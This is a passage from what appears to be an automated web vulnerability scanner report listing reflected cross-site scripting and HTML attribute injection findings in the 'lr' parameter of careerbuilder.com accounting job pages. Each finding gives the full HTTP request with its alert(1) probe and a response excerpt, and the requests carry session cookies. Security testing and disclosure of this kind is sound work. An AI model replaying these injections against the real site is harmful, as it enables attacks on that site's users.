User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 190697
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=742b47a46d174153b38634de2ce397ba-343070627-RE-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC6502B7EE094B552B2B70BBA9219CA94E77CE10351649902F41F8211398221DB738F2E1EB2D4C61F7C85; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:23:46 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:38:46 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL14
Date: Sun, 14 Nov 2010 22:23:46 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
in._introHTML = 'The feature you requested is only available to members. Please sign in to continue...';
CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5&ff=21';
CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later.";
CB.AJAX
...[SNIP]...

2.22. http://accounting.careerbuilder.com/ag.ic/Florida_Miami/ [lr parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami/

Issue detail

The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e36f"%20a%3db%20a374526cf1f was submitted in the lr parameter. This input was echoed as 3e36f" a=b a374526cf1f in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ag.ic/Florida_Miami/?lr=cbcb_mh3e36f"%20a%3db%20a374526cf1f&SiteID=cbcb_mh031 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 190052
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=4c1214c5309e47ab9c6e1f3f48696a30-343070602-R8-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC6508CD4B507BB40F27D5D49BB4DD41970517DAD82ED8DF2ADD73243653D37836DEF1D333B1CB075ACFF; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:23:22 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:38:22 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL8
Date: Sun, 14 Nov 2010 22:23:21 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
<input name="lr" type="hidden" value="cbcb_mh3e36f" a=b a374526cf1f" />
...[SNIP]...

2.23. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_Accounting.htm [lr parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami_Accounting.htm

Issue detail

The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9012c"%20a%3db%20369a2cb1a28 was submitted in the lr parameter. This input was echoed as 9012c" a=b 369a2cb1a28 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ag.ic/Florida_Miami_Accounting.htm?IPath=OCP&lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a59012c"%20a%3db%20369a2cb1a28&ff=21 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 196910
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_accounting.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR44
Date: Sun, 14 Nov 2010 23:06:07 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
<input name="lr" type="hidden" value="cbcb_mhf48aa'-alert(1)-'9d78db8d0a59012c" a=b 369a2cb1a28" />
...[SNIP]...

2.24. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_Accounting.htm [lr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami_Accounting.htm

Issue detail

The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ec784'-alert(1)-'194462e6124 was submitted in the lr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ag.ic/Florida_Miami_Accounting.htm?IPath=OCP&lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5ec784'-alert(1)-'194462e6124&ff=21 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 197437
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_accounting.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR22
Date: Sun, 14 Nov 2010 23:08:59 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
you requested is only available to members. Please sign in to continue...';
CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5ec784'-alert(1)-'194462e6124&ff=21';
CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later.";
CB.AJAX
...[SNIP]...

2.25. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_AccountsPayable.htm [lr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami_AccountsPayable.htm

Issue detail

The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c701a'-alert(1)-'781f62259bc was submitted in the lr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ag.ic/Florida_Miami_AccountsPayable.htm?IPath=OCP&lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5c701a'-alert(1)-'781f62259bc&ff=21 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 197657
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_accountspayable.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR32
Date: Sun, 14 Nov 2010 23:06:20 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
you requested is only available to members. Please sign in to continue...';
CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5c701a'-alert(1)-'781f62259bc&ff=21';
CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later.";
CB.AJAX
...[SNIP]...

2.26. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_AccountsPayable.htm [lr parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami_AccountsPayable.htm

Issue detail

The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f1a9"%20a%3db%20e961c1b811c was submitted in the lr parameter. This input was echoed as 9f1a9" a=b e961c1b811c in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ag.ic/Florida_Miami_AccountsPayable.htm?IPath=OCP&lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a59f1a9"%20a%3db%20e961c1b811c&ff=21 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 197275
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_accountspayable.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR41
Date: Sun, 14 Nov 2010 23:05:20 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
<input name="lr" type="hidden" value="cbcb_mhf48aa'-alert(1)-'9d78db8d0a59f1a9" a=b e961c1b811c" />
...[SNIP]...

2.27. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_AccountsReceivable.htm [lr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami_AccountsReceivable.htm

Issue detail

The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7ba5c'-alert(1)-'68fa7d568e0 was submitted in the lr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ag.ic/Florida_Miami_AccountsReceivable.htm?IPath=OCP&lr=cbcb_mhf48aa7ba5c'-alert(1)-'68fa7d568e0 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 190323
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_accountsreceivable.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR14
Date: Sun, 14 Nov 2010 23:14:45 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
ntroHTML = 'The feature you requested is only available to members. Please sign in to continue...';
CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mhf48aa7ba5c'-alert(1)-'68fa7d568e0&ff=21';
CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later.";
CB.AJAX
...[SNIP]...

2.28. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_AccountsReceivable.htm [lr parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami_AccountsReceivable.htm

Issue detail

The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be2ee"%20a%3db%20fed0e7e8bc3 was submitted in the lr parameter. This input was echoed as be2ee" a=b fed0e7e8bc3 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ag.ic/Florida_Miami_AccountsReceivable.htm?IPath=OCP&lr=cbcb_mhf48aabe2ee"%20a%3db%20fed0e7e8bc3 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 195095
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: jobresults.aspx:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR1
Date: Sun, 14 Nov 2010 23:11:31 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
<input name="lr" type="hidden" value="cbcb_mhf48aabe2ee" a=b fed0e7e8bc3" />
...[SNIP]...

2.29. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_Auditing.htm [lr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami_Auditing.htm

Issue detail

The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7154c'-alert(1)-'d6bb816219f was submitted in the lr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ag.ic/Florida_Miami_Auditing.htm?IPath=OCP&lr=cbcb_mhf48aa7154c'-alert(1)-'d6bb816219f HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 190040
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_auditing.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR37
Date: Sun, 14 Nov 2010 23:13:08 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
ntroHTML = 'The feature you requested is only available to members. Please sign in to continue...';
CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mhf48aa7154c'-alert(1)-'d6bb816219f&ff=21';
CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later.";
CB.AJAX
...[SNIP]...

2.30. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_Auditing.htm [lr parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami_Auditing.htm

Issue detail

The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cdbc"%20a%3db%205fc987899df was submitted in the lr parameter. This input was echoed as 2cdbc" a=b 5fc987899df in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ag.ic/Florida_Miami_Auditing.htm?IPath=OCP&lr=cbcb_mhf48aa2cdbc"%20a%3db%205fc987899df HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 189439
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_auditing.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR37
Date: Sun, 14 Nov 2010 23:09:49 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
<input name="lr" type="hidden" value="cbcb_mhf48aa2cdbc" a=b 5fc987899df" />
...[SNIP]...

2.31. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_Bookkeeping.htm [lr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami_Bookkeeping.htm

Issue detail

The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b07c4'-alert(1)-'57936a51b86 was submitted in the lr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ag.ic/Florida_Miami_Bookkeeping.htm?IPath=OCP&lr=cbcb_mhf48aab07c4'-alert(1)-'57936a51b86 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 190038
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_bookkeeping.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR44
Date: Sun, 14 Nov 2010 23:12:58 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
ntroHTML = 'The feature you requested is only available to members. Please sign in to continue...';
CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mhf48aab07c4'-alert(1)-'57936a51b86&ff=21';
CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later.";
CB.AJAX
...[SNIP]...

2.32. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_Bookkeeping.htm [lr parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami_Bookkeeping.htm

Issue detail

The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45eed"%20a%3db%206df7f904442 was submitted in the lr parameter. This input was echoed as 45eed" a=b 6df7f904442 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ag.ic/Florida_Miami_Bookkeeping.htm?IPath=OCP&lr=cbcb_mhf48aa45eed"%20a%3db%206df7f904442 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 189492
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_bookkeeping.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR44
Date: Sun, 14 Nov 2010 23:10:13 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
<input name="lr" type="hidden" value="cbcb_mhf48aa45eed" a=b 6df7f904442" />
...[SNIP]...

2.33. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_CPA.htm [lr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami_CPA.htm

Issue detail

The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3f293'-alert(1)-'786db9e58ce was submitted in the lr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ag.ic/Florida_Miami_CPA.htm?IPath=OCP&lr=cbcb_mhf48aa3f293'-alert(1)-'786db9e58ce HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 189895
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_cpa.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL12
Date: Sun, 14 Nov 2010 23:22:55 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
ntroHTML = 'The feature you requested is only available to members. Please sign in to continue...';
